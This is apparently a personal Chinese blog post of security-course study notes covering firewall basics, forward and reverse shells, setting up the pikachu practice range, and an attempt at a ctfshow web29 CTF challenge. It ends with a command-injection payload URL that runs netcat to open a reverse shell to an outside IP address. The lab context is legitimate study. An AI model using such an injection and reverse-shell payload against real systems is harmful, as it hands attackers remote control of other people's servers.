原创笔记笔记

小迪安全笔记-1

发表于2024-08-24更新于2024-09-26

南京

小迪安全笔记-1

Kn1ght2024-08-242024-09-26

棱角社区网站：

https://forum.ywhack.com/coding.php

防火墙

入站检测严格，出站检测宽松

windows:df防火墙

linux:iptables

常用命令

windows:https://blog.csdn.net/qq_39939541/article/details/131749915

linux:https://blog.csdn.net/wzk4869/article/details/132855372

文件上传下载

可以看棱角社区的网站：

例如：

反弹shell

正向：用服务器监听攻击机连接

反向：攻击机监听服务器连接

pikachu靶场搭建

https://blog.csdn.net/m0_73912575/article/details/135574328

看这一篇就够了，这篇讲的是用小皮搭的靶场

复现

然后这个靶场反弹shell没弹成功，让zyf开了个ctfshow web29的靶场，然后反弹shell，连上了，但是可能CTFos这个虚拟机反应有点慢，所以没反应

payload:

https://5909aed2-8a0a-4583-84ee-76a3e7538c6c.challenge.ctf.show/?c=system(“nc 113.56.218.150 11288 -e /bin/sh/“);

Kn1ght

Kn1ght

原创小迪安全笔记-1

打赏作者

感谢你赐予我前进的力量

微信
支付宝

赞赏者名单

因为你们的支持让我意识到写文章的价值🙏

本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自个人博客！

喜欢这篇文章的人也看了

小迪安全笔记-2

小迪安全笔记-3